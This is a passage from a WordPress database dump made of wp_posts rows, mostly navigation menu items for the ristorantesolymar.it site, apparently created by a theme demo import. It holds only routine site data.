10:25:47','',0,'http://attika.mikado-themes.com/?p=1693',0,'post','',0),(3771,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3771','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',0,'https://www.ristorantesolymar.it/2021/01/20/3771/',2,'nav_menu_item','',0),(3772,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3772','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',0,'https://www.ristorantesolymar.it/2021/01/20/3772/',34,'nav_menu_item','',0),(3773,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3773','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',0,'https://www.ristorantesolymar.it/2021/01/20/3773/',42,'nav_menu_item','',0),(3774,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3774','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',0,'https://www.ristorantesolymar.it/2021/01/20/3774/',43,'nav_menu_item','',0),(3775,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3775','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',0,'https://www.ristorantesolymar.it/2021/01/20/3775/',41,'nav_menu_item','',0),(3776,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3776','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',3039,'https://www.ristorantesolymar.it/2021/01/20/3776/',96,'nav_menu_item','',0),(3777,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3777','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',3039,'https://www.ristorantesolymar.it/2021/01/20/3777/',52,'nav_menu_item','',0),(3778,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3778','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',0,'https://www.ristorantesolymar.it/2021/01/20/3778/',2,'nav_menu_item','',0),(3779,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3779','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',0,'https://www.ristorantesolymar.it/2021/01/20/3779/',11,'nav_menu_item','',0),(3780,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3780','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',0,'https://www.ristorantesolymar.it/2021/01/20/3780/',9,'nav_menu_item','',0),(3781,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3781','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',0,'https://www.ristorantesolymar.it/2021/01/20/3781/',10,'nav_menu_item','',0),(3782,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3782','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',0,'https://www.ristorantesolymar.it/2021/01/20/3782/',20,'nav_menu_item','',0),(3783,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3783','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',0,'https://www.ristorantesolymar.it/2021/01/20/3783/',16,'nav_menu_item','',0),(3784,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3784','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',0,'https://www.ristorantesolymar.it/2021/01/20/3784/',4,'nav_menu_item','',0),(3785,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3785','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',0,'https://www.ristorantesolymar.it/2021/01/20/3785/',3,'nav_menu_item','',0),(3786,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3786','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',0,'https://www.ristorantesolymar.it/2021/01/20/3786/',4,'nav_menu_item','',0),(3787,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3787','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',0,'https://www.ristorantesolymar.it/2021/01/20/3787/',3,'nav_menu_item','',0),(3788,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3788','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',0,'https://www.ristorantesolymar.it/2021/01/20/3788/',12,'nav_menu_item','',0),(3789,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3789','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',0,'https://www.ristorantesolymar.it/2021/01/20/3789/',19,'nav_menu_item','',0),(3790,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3790','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',0,'https://www.ristorantesolymar.it/2021/01/20/3790/',44,'nav_menu_item','',0),(3791,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3791','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',0,'https://www.ristorantesolymar.it/2021/01/20/3791/',13,'nav_menu_item','',0),(3792,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3792','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',0,'https://www.ristorantesolymar.it/2021/01/20/3792/',13,'nav_menu_item','',0),(3793,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3793','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',3034,'https://www.ristorantesolymar.it/2021/01/20/3793/',7,'nav_menu_item','',0),(3794,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3794','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',3034,'https://www.ristorantesolymar.it/2021/01/20/3794/',6,'nav_menu_item','',0),(3795,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3795','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',3034,'https://www.ristorantesolymar.it/2021/01/20/3795/',5,'nav_menu_item','',0),(3796,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3796','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',3034,'https://www.ristorantesolymar.it/2021/01/20/3796/',18,'nav_menu_item','',0),(3797,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3797','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',3034,'https://www.ristorantesolymar.it/2021/01/20/3797/',39,'nav_menu_item','',0),(3798,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3798','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',3034,'https://www.ristorantesolymar.it/2021/01/20/3798/',38,'nav_menu_item','',0),(3799,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3799','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',3034,'https://www.ristorantesolymar.it/2021/01/20/3799/',37,'nav_menu_item','',0),(3800,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3800','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',0,'https://www.ristorantesolymar.it/2021/01/20/3800/',14,'nav_menu_item','',0),(3801,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3801','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',0,'https://www.ristorantesolymar.it/2021/01/20/3801/',21,'nav_menu_item','',0),(3802,1,'2021-01-20 18:24:37','2021-01-20 17:24:37',' ','','','publish','closed','closed','','3802','','','2021-01-20 18:24:37','2021-01-20 17:24:37','',0,'https://www.ristorantesolymar.it/2021/01/20/3802/',15,'nav_menu_item','',0),(3803,1,'2021-01-20 18:24:38','2021-01-20 17:24:38',' ','','','publish','closed','closed','','3803','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',0,'https://www.ristorantesolymar.it/2021/01/20/3803/',16,'nav_menu_item','',0),(3804,1,'2021-01-20 18:24:38','2021-01-20 17:24:38',' ','','','publish','closed','closed','','3804','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',0,'https://www.ristorantesolymar.it/2021/01/20/3804/',2,'nav_menu_item','',0),(3805,1,'2021-01-20 18:24:38','2021-01-20 17:24:38',' ','','','publish','closed','closed','','3805','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',0,'https://www.ristorantesolymar.it/2021/01/20/3805/',3,'nav_menu_item','',0),(3806,1,'2021-01-20 18:24:38','2021-01-20 17:24:38',' ','','','publish','closed','closed','','3806','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',0,'https://www.ristorantesolymar.it/2021/01/20/3806/',2,'nav_menu_item','',0),(3807,1,'2021-01-20 18:24:38','2021-01-20 17:24:38',' ','','','publish','closed','closed','','3807','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',0,'https://www.ristorantesolymar.it/2021/01/20/3807/',2,'nav_menu_item','',0),(3808,1,'2021-01-20 18:24:38','2021-01-20 17:24:38',' ','','','publish','closed','closed','','3808','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',0,'https://www.ristorantesolymar.it/2021/01/20/3808/',18,'nav_menu_item','',0),(3809,1,'2021-01-20 18:24:38','2021-01-20 17:24:38',' ','','','publish','closed','closed','','3809','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',0,'https://www.ristorantesolymar.it/2021/01/20/3809/',9,'nav_menu_item','',0),(3810,1,'2021-01-20 18:24:38','2021-01-20 17:24:38',' ','','','publish','closed','closed','','3810','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',0,'https://www.ristorantesolymar.it/2021/01/20/3810/',9,'nav_menu_item','',0),(3811,1,'2021-01-20 18:24:38','2021-01-20 17:24:38',' ','','','publish','closed','closed','','3811','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',0,'https://www.ristorantesolymar.it/2021/01/20/3811/',5,'nav_menu_item','',0),(3812,1,'2021-01-20 18:24:38','2021-01-20 17:24:38',' ','','','publish','closed','closed','','3812','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',0,'https://www.ristorantesolymar.it/2021/01/20/3812/',7,'nav_menu_item','',0),(3813,1,'2021-01-20 18:24:38','2021-01-20 17:24:38',' ','','','publish','closed','closed','','3813','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',0,'https://www.ristorantesolymar.it/2021/01/20/3813/',7,'nav_menu_item','',0),(3814,1,'2021-01-20 18:24:38','2021-01-20 17:24:38',' ','','','publish','closed','closed','','3814','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',0,'https://www.ristorantesolymar.it/2021/01/20/3814/',5,'nav_menu_item','',0),(3815,1,'2021-01-20 18:24:38','2021-01-20 17:24:38',' ','','','publish','closed','closed','','3815','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',0,'https://www.ristorantesolymar.it/2021/01/20/3815/',5,'nav_menu_item','',0),(3816,1,'2021-01-20 18:24:38','2021-01-20 17:24:38',' ','','','publish','closed','closed','','3816','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',0,'https://www.ristorantesolymar.it/2021/01/20/3816/',12,'nav_menu_item','',0),(3817,1,'2021-01-20 18:24:38','2021-01-20 17:24:38',' ','','','publish','closed','closed','','3817','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',0,'https://www.ristorantesolymar.it/2021/01/20/3817/',19,'nav_menu_item','',0),(3818,1,'2021-01-20 18:24:38','2021-01-20 17:24:38',' ','','','publish','closed','closed','','3818','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',0,'https://www.ristorantesolymar.it/2021/01/20/3818/',17,'nav_menu_item','',0),(3819,1,'2021-01-20 18:24:38','2021-01-20 17:24:38',' ','','','publish','closed','closed','','3819','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',0,'https://www.ristorantesolymar.it/2021/01/20/3819/',20,'nav_menu_item','',0),(3820,1,'2021-01-20 18:24:38','2021-01-20 17:24:38',' ','','','publish','closed','closed','','3820','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',0,'https://www.ristorantesolymar.it/2021/01/20/3820/',8,'nav_menu_item','',0),(3821,1,'2021-01-20 18:24:38','2021-01-20 17:24:38',' ','','','publish','closed','closed','','3821','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',0,'https://www.ristorantesolymar.it/2021/01/20/3821/',8,'nav_menu_item','',0),(3822,1,'2021-01-20 18:24:38','2021-01-20 17:24:38',' ','','','publish','closed','closed','','3822','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',0,'https://www.ristorantesolymar.it/2021/01/20/3822/',4,'nav_menu_item','',0),(3823,1,'2021-01-20 18:24:38','2021-01-20 17:24:38','','Four Columns Wide','','publish','closed','closed','','four-columns-wide-5','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',3061,'https://www.ristorantesolymar.it/2021/01/20/four-columns-wide-5/',57,'nav_menu_item','',0),(3824,1,'2021-01-20 18:24:38','2021-01-20 17:24:38','','Four Columns','','publish','closed','closed','','four-columns-5','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',3061,'https://www.ristorantesolymar.it/2021/01/20/four-columns-5/',56,'nav_menu_item','',0),(3825,1,'2021-01-20 18:24:38','2021-01-20 17:24:38','','Three Columns','','publish','closed','closed','','three-columns-5','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',3061,'https://www.ristorantesolymar.it/2021/01/20/three-columns-5/',55,'nav_menu_item','',0),(3826,1,'2021-01-20 18:24:38','2021-01-20 17:24:38','','Big Slider','','publish','closed','closed','','big-slider-5','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',0,'https://www.ristorantesolymar.it/2021/01/20/big-slider-5/',65,'nav_menu_item','',0),(3827,1,'2021-01-20 18:24:38','2021-01-20 17:24:38','','Small Images','','publish','closed','closed','','small-images-5','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',0,'https://www.ristorantesolymar.it/2021/01/20/small-images-5/',64,'nav_menu_item','',0),(3828,1,'2021-01-20 18:24:38','2021-01-20 17:24:38','','Big Images','','publish','closed','closed','','big-images-5','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',0,'https://www.ristorantesolymar.it/2021/01/20/big-images-5/',63,'nav_menu_item','',0),(3829,1,'2021-01-20 18:24:38','2021-01-20 17:24:38','','Big Gallery','','publish','closed','closed','','big-gallery-5','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',0,'https://www.ristorantesolymar.it/2021/01/20/big-gallery-5/',67,'nav_menu_item','',0),(3830,1,'2021-01-20 18:24:38','2021-01-20 17:24:38',' ','','','publish','closed','closed','','3830','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',0,'https://www.ristorantesolymar.it/2021/01/20/3830/',6,'nav_menu_item','',0),(3831,1,'2021-01-20 18:24:38','2021-01-20 17:24:38',' ','','','publish','closed','closed','','3831','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',0,'https://www.ristorantesolymar.it/2021/01/20/3831/',6,'nav_menu_item','',0),(3832,1,'2021-01-20 18:24:38','2021-01-20 17:24:38',' ','','','publish','closed','closed','','3832','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',3039,'https://www.ristorantesolymar.it/2021/01/20/3832/',70,'nav_menu_item','',0),(3833,1,'2021-01-20 18:24:38','2021-01-20 17:24:38',' ','','','publish','closed','closed','','3833','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',3039,'https://www.ristorantesolymar.it/2021/01/20/3833/',97,'nav_menu_item','',0),(3834,1,'2021-01-20 18:24:38','2021-01-20 17:24:38',' ','','','publish','closed','closed','','3834','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',3039,'https://www.ristorantesolymar.it/2021/01/20/3834/',98,'nav_menu_item','',0),(3835,1,'2021-01-20 18:24:38','2021-01-20 17:24:38',' ','','','publish','closed','closed','','3835','','','2021-01-20 18:24:38','2021-01-20 17:24:38','',3039,'https://www.ristorantesolymar.it/2021/01/20/3835/',26,'nav_menu_item','',0),(3836,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3836','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',3039,'https://www.ristorantesolymar.it/2021/01/20/3836/',53,'nav_menu_item','',0),(3837,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3837','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',3039,'https://www.ristorantesolymar.it/2021/01/20/3837/',54,'nav_menu_item','',0),(3838,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3838','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',3039,'https://www.ristorantesolymar.it/2021/01/20/3838/',27,'nav_menu_item','',0),(3839,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3839','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',3039,'https://www.ristorantesolymar.it/2021/01/20/3839/',71,'nav_menu_item','',0),(3840,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3840','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',3039,'https://www.ristorantesolymar.it/2021/01/20/3840/',73,'nav_menu_item','',0),(3841,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3841','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',3039,'https://www.ristorantesolymar.it/2021/01/20/3841/',29,'nav_menu_item','',0),(3842,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3842','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',3039,'https://www.ristorantesolymar.it/2021/01/20/3842/',43,'nav_menu_item','',0),(3843,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3843','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',3039,'https://www.ristorantesolymar.it/2021/01/20/3843/',36,'nav_menu_item','',0),(3844,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3844','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',3039,'https://www.ristorantesolymar.it/2021/01/20/3844/',44,'nav_menu_item','',0),(3845,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3845','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',3039,'https://www.ristorantesolymar.it/2021/01/20/3845/',80,'nav_menu_item','',0),(3846,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3846','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',3039,'https://www.ristorantesolymar.it/2021/01/20/3846/',88,'nav_menu_item','',0),(3847,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3847','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',3039,'https://www.ristorantesolymar.it/2021/01/20/3847/',87,'nav_menu_item','',0),(3848,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3848','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',3039,'https://www.ristorantesolymar.it/2021/01/20/3848/',79,'nav_menu_item','',0),(3849,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3849','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',3039,'https://www.ristorantesolymar.it/2021/01/20/3849/',35,'nav_menu_item','',0),(3850,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3850','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',3039,'https://www.ristorantesolymar.it/2021/01/20/3850/',30,'nav_menu_item','',0),(3851,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3851','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',3039,'https://www.ristorantesolymar.it/2021/01/20/3851/',74,'nav_menu_item','',0),(3852,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3852','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',3039,'https://www.ristorantesolymar.it/2021/01/20/3852/',81,'nav_menu_item','',0),(3853,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3853','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',3039,'https://www.ristorantesolymar.it/2021/01/20/3853/',37,'nav_menu_item','',0),(3854,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3854','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',3039,'https://www.ristorantesolymar.it/2021/01/20/3854/',28,'nav_menu_item','',0),(3855,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3855','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',3039,'https://www.ristorantesolymar.it/2021/01/20/3855/',47,'nav_menu_item','',0),(3856,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3856','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',3039,'https://www.ristorantesolymar.it/2021/01/20/3856/',72,'nav_menu_item','',0),(3857,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3857','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',3039,'https://www.ristorantesolymar.it/2021/01/20/3857/',91,'nav_menu_item','',0),(3858,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3858','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',0,'https://www.ristorantesolymar.it/2021/01/20/3858/',23,'nav_menu_item','',0),(3859,1,'2021-01-20 18:24:39','2021-01-20 17:24:39','','Standard','','publish','closed','closed','','standard','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',0,'https://www.ristorantesolymar.it/2021/01/20/standard/',27,'nav_menu_item','',0),(3860,1,'2021-01-20 18:24:39','2021-01-20 17:24:39','','Gallery','','publish','closed','closed','','gallery','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',0,'https://www.ristorantesolymar.it/2021/01/20/gallery/',28,'nav_menu_item','',0),(3861,1,'2021-01-20 18:24:39','2021-01-20 17:24:39','','Link','','publish','closed','closed','','link','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',0,'https://www.ristorantesolymar.it/2021/01/20/link/',29,'nav_menu_item','',0),(3862,1,'2021-01-20 18:24:39','2021-01-20 17:24:39','','Quote','','publish','closed','closed','','quote','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',0,'https://www.ristorantesolymar.it/2021/01/20/quote/',30,'nav_menu_item','',0),(3863,1,'2021-01-20 18:24:39','2021-01-20 17:24:39','','Video','','publish','closed','closed','','video','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',0,'https://www.ristorantesolymar.it/2021/01/20/video/',31,'nav_menu_item','',0),(3864,1,'2021-01-20 18:24:39','2021-01-20 17:24:39','','Audio','','publish','closed','closed','','audio','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',0,'https://www.ristorantesolymar.it/2021/01/20/audio/',32,'nav_menu_item','',0),(3865,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3865','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',3039,'https://www.ristorantesolymar.it/2021/01/20/3865/',82,'nav_menu_item','',0),(3866,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3866','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',3039,'https://www.ristorantesolymar.it/2021/01/20/3866/',38,'nav_menu_item','',0),(3867,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3867','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',3039,'https://www.ristorantesolymar.it/2021/01/20/3867/',75,'nav_menu_item','',0),(3868,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3868','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',3039,'https://www.ristorantesolymar.it/2021/01/20/3868/',31,'nav_menu_item','',0),(3869,1,'2021-01-20 18:24:39','2021-01-20 17:24:39',' ','','','publish','closed','closed','','3869','','','2021-01-20 18:24:39','2021-01-20 17:24:39','',0,'https://www.ristorantesolymar.it/2021/01/20/3869/',5,'nav_menu_item','',0),(3870,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3870','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',0,'https://www.ristorantesolymar.it/2021/01/20/3870/',3,'nav_menu_item','',0),(3871,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3871','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',3039,'https://www.ristorantesolymar.it/2021/01/20/3871/',92,'nav_menu_item','',0),(3872,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3872','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',3039,'https://www.ristorantesolymar.it/2021/01/20/3872/',99,'nav_menu_item','',0),(3873,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3873','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',3039,'https://www.ristorantesolymar.it/2021/01/20/3873/',48,'nav_menu_item','',0),(3874,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3874','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',3039,'https://www.ristorantesolymar.it/2021/01/20/3874/',55,'nav_menu_item','',0),(3875,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3875','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',0,'https://www.ristorantesolymar.it/2021/01/20/3875/',7,'nav_menu_item','',0),(3876,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3876','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',0,'https://www.ristorantesolymar.it/2021/01/20/3876/',10,'nav_menu_item','',0),(3877,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3877','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',0,'https://www.ristorantesolymar.it/2021/01/20/3877/',8,'nav_menu_item','',0),(3878,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3878','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',0,'https://www.ristorantesolymar.it/2021/01/20/3878/',9,'nav_menu_item','',0),(3879,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3879','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',3061,'https://www.ristorantesolymar.it/2021/01/20/3879/',12,'nav_menu_item','',0),(3880,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3880','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',3061,'https://www.ristorantesolymar.it/2021/01/20/3880/',13,'nav_menu_item','',0),(3881,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3881','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',3061,'https://www.ristorantesolymar.it/2021/01/20/3881/',14,'nav_menu_item','',0),(3882,1,'2021-01-20 18:24:40','2021-01-20 17:24:40','','Standard List','','publish','closed','closed','','standard-list-5','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',0,'https://www.ristorantesolymar.it/2021/01/20/standard-list-5/',16,'nav_menu_item','',0),(3883,1,'2021-01-20 18:24:40','2021-01-20 17:24:40','','Blog Standard','','publish','closed','closed','','blog-standard','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',0,'https://www.ristorantesolymar.it/2021/01/20/blog-standard/',17,'nav_menu_item','',0),(3884,1,'2021-01-20 18:24:40','2021-01-20 17:24:40','','Blog Gallery','','publish','closed','closed','','blog-gallery','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',0,'https://www.ristorantesolymar.it/2021/01/20/blog-gallery/',18,'nav_menu_item','',0),(3885,1,'2021-01-20 18:24:40','2021-01-20 17:24:40','','Blog Standard','','publish','closed','closed','','blog-standard-2','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',0,'https://www.ristorantesolymar.it/2021/01/20/blog-standard-2/',13,'nav_menu_item','',0),(3886,1,'2021-01-20 18:24:40','2021-01-20 17:24:40','','Blog Gallery','','publish','closed','closed','','blog-gallery-2','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',0,'https://www.ristorantesolymar.it/2021/01/20/blog-gallery-2/',14,'nav_menu_item','',0),(3887,1,'2021-01-20 18:24:40','2021-01-20 17:24:40','','Standard List','','publish','closed','closed','','standard-list-6','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',0,'https://www.ristorantesolymar.it/2021/01/20/standard-list-6/',12,'nav_menu_item','',0),(3888,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3888','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',0,'https://www.ristorantesolymar.it/2021/01/20/3888/',7,'nav_menu_item','',0),(3889,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3889','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',0,'https://www.ristorantesolymar.it/2021/01/20/3889/',8,'nav_menu_item','',0),(3890,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3890','','','2021-01-20 18:24:40','2021-01-20 